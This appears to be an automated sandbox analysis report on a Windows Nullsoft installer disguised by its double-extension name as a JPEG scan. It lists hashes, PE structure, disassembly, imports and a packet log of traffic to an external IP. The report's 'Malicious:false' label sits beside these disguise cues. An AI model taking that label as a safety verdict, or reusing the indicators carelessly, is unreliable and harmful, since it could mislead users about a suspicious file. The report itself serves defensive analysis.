                                SHA-512:4E47EB1E98EEC1873628DAB77E75532FBD9C51BE5FBA8AB05B69E25500AE873BE1E36C84854F8D4384A3088A95DC0251B1D6342542837F9211949B8840743E60
                                Malicious:false
                                Preview:......#.....5.#.....F..................+.i..........9............r...h...D..F.....5.%......vz...............I..I`.._.{........S.t.......................0...........K...z.....................T.......G..6.....j......b.........v.H......_..<.E... ...........A.{..p.....}.R.._.@....].B.}...S}.n...Na........p...=W..d.h.5.....*)x....:.................c.........}..z.K...J.s.....\A.......n...u..4.................A.../..8..5..r~...;....0...td.%........>...........k...y.._#.....W...gd4.w...m.......#=.....%....1....../......}..................R.......B...\.....F.....K.5..P..j.6u...;......................4.......S`.o..Q.r..........Z.....s..[.............................g.........................N............./h.............d....w.c.....m......B..4......!....XD...B...Y.....:...........b.........2........iG...u...k...........(.w.................=..h....d.-..>......r......o...............F................[.....5.?.......h.xQ..................+................x............+......u.......XS....
                                File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                Entropy (8bit):6.745778158253723
                                TrID:
                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                • Generic Win/DOS Executable (2004/3) 0.02%
                                • DOS Executable Generic (2002/1) 0.02%
                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                File name:jpgcamscanner_20240521_0072345_JPEG.bat.exe
                                File size:379'400 bytes
                                MD5:18776562551c3adcdc9f49c013772fbd
                                SHA1:ee124b7cd0296b4e524454ab12059b8be60bc002
                                SHA256:05df6f3430171cb7db9fa5f6782b8f67b14079b6e1dffbb013c33ca91b1ad5d3
                                SHA512:c16b5c1c7822af0bee4d5f9707e00a4513e00b0925844fa3c8ba8afbaf7172d2b185dfaf8b1bc1fdce00c6a44d62d34d5bf611c0a2219de0a030ea2f64767364
                                SSDEEP:6144:MDGIRuoQiOd9kyzCiY1vJ/BnA+XCzW8w3hRTMiZ4rbcevq:zItQiOdCyzItA+XLRQiZWC
                                TLSH:B8849E90D274A8A6D84312734D3BD9E0216FAF3C9574851F261DB83AA6F734B1367E0E
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........(...F...F...F.*.....F...G.v.F.*.....F...v...F...@...F.Rich..F.........................PE..L...+.oZ.................`.........
                                Icon Hash:b4b2b2b2bcb2b669
                                Entrypoint:0x4031d6
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                Time Stamp:0x5A6FED2B [Tue Jan 30 03:57:31 2018 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:3abe302b6d9a1256e6a915429af4ffd2
                                Instruction
                                sub esp, 00000184h
                                push ebx
                                push esi
                                push edi
                                xor ebx, ebx
                                push 00008001h
                                mov dword ptr [esp+18h], ebx
                                mov dword ptr [esp+10h], 00409198h
                                mov dword ptr [esp+20h], ebx
                                mov byte ptr [esp+14h], 00000020h
                                call dword ptr [004070A0h]
                                call dword ptr [0040709Ch]
                                and eax, BFFFFFFFh
                                cmp ax, 00000006h
                                mov dword ptr [0042370Ch], eax
                                je 00007F82A0BA03D3h
                                push ebx
                                call 00007F82A0BA34AAh
                                cmp eax, ebx
                                je 00007F82A0BA03C9h
                                push 00000C00h
                                call eax
                                mov esi, 00407298h
                                push esi
                                call 00007F82A0BA3426h
                                push esi
                                call dword ptr [00407098h]
                                lea esi, dword ptr [esi+eax+01h]
                                cmp byte ptr [esi], bl
                                jne 00007F82A0BA03ADh
                                push 0000000Ah
                                call 00007F82A0BA347Eh
                                push 00000008h
                                call 00007F82A0BA3477h
                                push 00000006h
                                mov dword ptr [00423704h], eax
                                call 00007F82A0BA346Bh
                                cmp eax, ebx
                                je 00007F82A0BA03D1h
                                push 0000001Eh
                                call eax
                                test eax, eax
                                je 00007F82A0BA03C9h
                                or byte ptr [0042370Fh], 00000040h
                                push ebp
                                call dword ptr [00407044h]
                                push ebx
                                call dword ptr [00407288h]
                                mov dword ptr [004237D8h], eax
                                push ebx
                                lea eax, dword ptr [esp+38h]
                                push 00000160h
                                push eax
                                push ebx
                                push 0041ECC8h
                                call dword ptr [00407178h]
                                push 00409188h
                                Programming Language:
                                • [EXP] VC++ 6.0 SP5 build 8804
                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x74280xa0.rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x3d0000x282e0.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x70000x298.rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x10000x5f0d0x6000dfef90bbbed6c8d8369917b85f400880False0.6649169921875data6.450520423955375IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .rdata0x70000x12480x14001c9a524313c13059919ecf8195d205beFalse0.4275390625data5.007650149182371IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data0x90000x1a8180x40006c5105864978df88e34770eefada5daFalse0.6376953125data5.129587811765307IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .ndata0x240000x190000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                .rsrc0x3d0000x282e00x28400e47a7998864b5d4b9b25d40ba1fdb078False0.23467221467391305data4.288859004027817IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                RT_ICON0x3d3280x10828Device independent bitmap graphic, 128 x 256 x 32, image size 67584EnglishUnited States0.17542588430143144
                                RT_ICON0x4db500x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 38016EnglishUnited States0.2506043725036788
                                RT_ICON0x56ff80x5488Device independent bitmap graphic, 72 x 144 x 32, image size 21600EnglishUnited States0.27587800369685767
                                RT_ICON0x5c4800x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16896EnglishUnited States0.2593292394898441
                                RT_ICON0x606a80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.33112033195020746
                                RT_ICON0x62c500x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.36843339587242024
                                RT_ICON0x63cf80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.4540983606557377
                                RT_ICON0x646800x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.5328014184397163
                                RT_DIALOG0x64ae80x100dataEnglishUnited States0.5234375
                                RT_DIALOG0x64be80x11cdataEnglishUnited States0.6056338028169014
                                RT_DIALOG0x64d080x60dataEnglishUnited States0.7291666666666666
                                RT_GROUP_ICON0x64d680x76dataEnglishUnited States0.7457627118644068
                                RT_VERSION0x64de00x1bcdataEnglishUnited States0.536036036036036
                                RT_MANIFEST0x64fa00x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795
                                DLLImport
                                KERNEL32.dllGetTempPathA, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, SetEnvironmentVariableA, Sleep, GetTickCount, GetCommandLineA, lstrlenA, GetVersion, SetErrorMode, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GetWindowsDirectoryA, SetCurrentDirectoryA, GetLastError, CreateDirectoryA, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, ReadFile, WriteFile, lstrcpyA, MoveFileExA, lstrcatA, GetSystemDirectoryA, GetProcAddress, GetExitCodeProcess, WaitForSingleObject, CompareFileTime, SetFileAttributesA, GetFileAttributesA, GetShortPathNameA, MoveFileA, GetFullPathNameA, SetFileTime, SearchPathA, CloseHandle, lstrcmpiA, CreateThread, GlobalLock, lstrcmpA, FindFirstFileA, FindNextFileA, DeleteFileA, SetFilePointer, GetPrivateProfileStringA, FindClose, MultiByteToWideChar, FreeLibrary, MulDiv, WritePrivateProfileStringA, LoadLibraryExA, GetModuleHandleA, GlobalAlloc, GlobalFree, ExpandEnvironmentStringsA
                                USER32.dllScreenToClient, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, PostQuitMessage, GetWindowRect, EnableMenuItem, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, ReleaseDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndDialog, RegisterClassA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, ExitWindowsEx, GetDC, CreateDialogParamA, SetTimer, GetDlgItem, SetWindowLongA, SetForegroundWindow, LoadImageA, IsWindow, SendMessageTimeoutA, FindWindowExA, OpenClipboard, TrackPopupMenu, AppendMenuA, EndPaint, DestroyWindow, wsprintfA, ShowWindow, SetWindowTextA
                                GDI32.dllSelectObject, SetBkMode, CreateFontIndirectA, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                SHELL32.dllSHGetSpecialFolderLocation, ShellExecuteExA, SHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, SHFileOperationA
                                ADVAPI32.dllAdjustTokenPrivileges, RegCreateKeyExA, RegOpenKeyExA, SetFileSecurityA, OpenProcessToken, LookupPrivilegeValueA, RegEnumValueA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegSetValueExA, RegQueryValueExA, RegEnumKeyA
                                COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
                                Language of compilation systemCountry where language is spokenMap
                                EnglishUnited States
                                TimestampSource PortDest PortSource IPDest IP
                                May 22, 2024 20:14:50.984671116 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.221349001 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.221534014 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.221993923 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.458771944 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.464617968 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.464632988 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.464770079 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.464775085 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.464775085 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.464785099 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.464796066 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.464807987 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.464818954 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.464829922 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.464875937 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.464886904 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.464920044 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.464920044 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.464968920 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.464968920 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.465018034 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.701567888 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.701584101 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.701669931 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.701723099 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.701723099 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.701782942 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.701819897 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.701915026 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.701929092 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.702033043 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.702106953 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.702145100 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.702219963 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.702310085 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.702338934 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.702378988 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.702389002 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.702400923 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.702496052 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.702496052 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.702496052 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.702507973 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.702518940 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.702529907 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.702550888 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.702593088 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.702600956 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.702613115 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.702642918 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.702642918 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.702691078 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.702721119 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.702740908 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.702740908 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.702740908 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.702867031 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.702886105 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.703042030 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.938297033 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.938311100 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.938400030 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.938463926 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.938463926 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.938476086 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.938508987 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.938560963 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.938615084 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.938615084 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.938819885 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.938833952 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.938844919 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.938855886 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.938867092 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.938878059 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.938889027 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.938945055 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.939023018 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.939037085 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.939048052 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.939059019 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.939081907 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.939135075 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.939152956 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.939152956 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.939201117 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.939207077 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.939295053 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.939299107 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.939320087 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.939424992 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.939424992 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.939475060 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.939522982 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.939527035 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.939538956 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.939595938 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.939636946 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.939649105 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.939718008 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.939738035 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.939765930 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.939826965 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.939835072 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.939879894 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.939883947 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.939883947 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.939980984 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.939991951 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.940018892 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.940030098 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.940112114 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.940138102 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.940192938 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.940192938 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.940234900 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.940272093 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.940283060 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.940304995 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.940381050 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.940438986 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.940476894 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.940516949 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.940522909 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.940536022 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:51.940608978 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.940608978 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:51.940706015 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.175352097 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.175436020 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.175503016 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.175559998 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.175616026 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.175642967 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.175642967 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.175672054 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.175708055 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.175734043 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.175795078 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.175797939 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.175795078 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.175857067 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.175914049 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.175923109 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.175968885 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.175970078 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.176017046 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.176027060 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.176065922 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.176084042 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.176125050 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.176141977 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.176232100 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.176243067 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.176301003 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.176306963 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.176354885 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.176409960 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.176410913 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.176460028 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.176465034 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.176517963 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.176520109 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.176574945 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.176579952 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.176630974 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.176659107 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.176659107 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.176686049 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.176740885 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.176754951 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.176795959 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.176804066 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.176851034 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.176852942 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.176902056 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.176906109 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.176956892 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.176960945 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.177005053 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.177016973 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.177061081 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.177074909 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.177109003 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.177130938 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.177165031 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.177186012 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.177212954 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.177242041 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.177295923 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.177346945 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.177350998 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.177395105 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.177407026 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.177443981 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.177462101 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.177503109 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.177516937 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.177551031 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.177572012 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.177609921 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.177628040 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.177684069 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.177685022 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.177732944 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.177740097 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.177788973 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.177795887 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.177836895 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.177853107 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.177892923 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.177907944 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.177941084 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.177963972 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.178019047 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.178023100 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.178071022 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.178076029 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.178131104 CEST8059326192.250.227.27192.168.11.20
                                May 22, 2024 20:14:52.178141117 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.178141117 CEST5932680192.168.11.20192.250.227.27
                                May 22, 2024 20:14:52.178186893 CEST8059326192.250.227.27192.168.11.20
